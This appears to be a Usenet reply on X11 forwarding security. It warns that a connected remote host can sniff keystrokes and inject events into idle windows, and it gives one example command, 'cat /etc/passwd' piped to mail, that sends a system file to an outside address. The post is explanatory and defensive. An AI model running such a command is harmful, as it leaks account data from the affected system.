David Steuber <email@example.com> wrote:
| I guess the biggest problem with distributing an application via the
| X11 protocol is the dearth of X11 servers on clients compared to HTTP
| clients. X11 forwarding also has to work to deal with such things as
| firewalls and NAT.
And security, which is almost impossible to get around unless *you*
securely own both ends of the connection. That is, any host that you
allow unrestricted connections to your local X server can sniff keystrokes
(including passwords), insert events into other windows ("Hmmm... there's
an xterm that's currently iconified and not doing anything. Let's get it
to do a 'cat /etc/passwd | mail firstname.lastname@example.org'"), and other nasty
Using MTI-MAGIC-COOKIE-1 authentication helps, as does using X *only*
over SSH tunnels, but even then a malignant sysadmin on the remote host
could make "ALL YOUR BASE BELONG TO US!"
When it comes down to it, that's the fundamental problem with *all*
proposals for putting "smart" code on the client (or user) side of
the net: You the user have to "trust" the code that you downloaded.
Well, building a "web of trust" that means more than a politician's
promise is a *VERY* hard thing to do. Every day there are examples
of "Oops! We didn't know it could do that!" Just read "comp.risks"...
Rob Warnock <email@example.com>
627 26th Avenue <URL:http://rpw3.org/>
San Mateo, CA 94403 (650)572-2607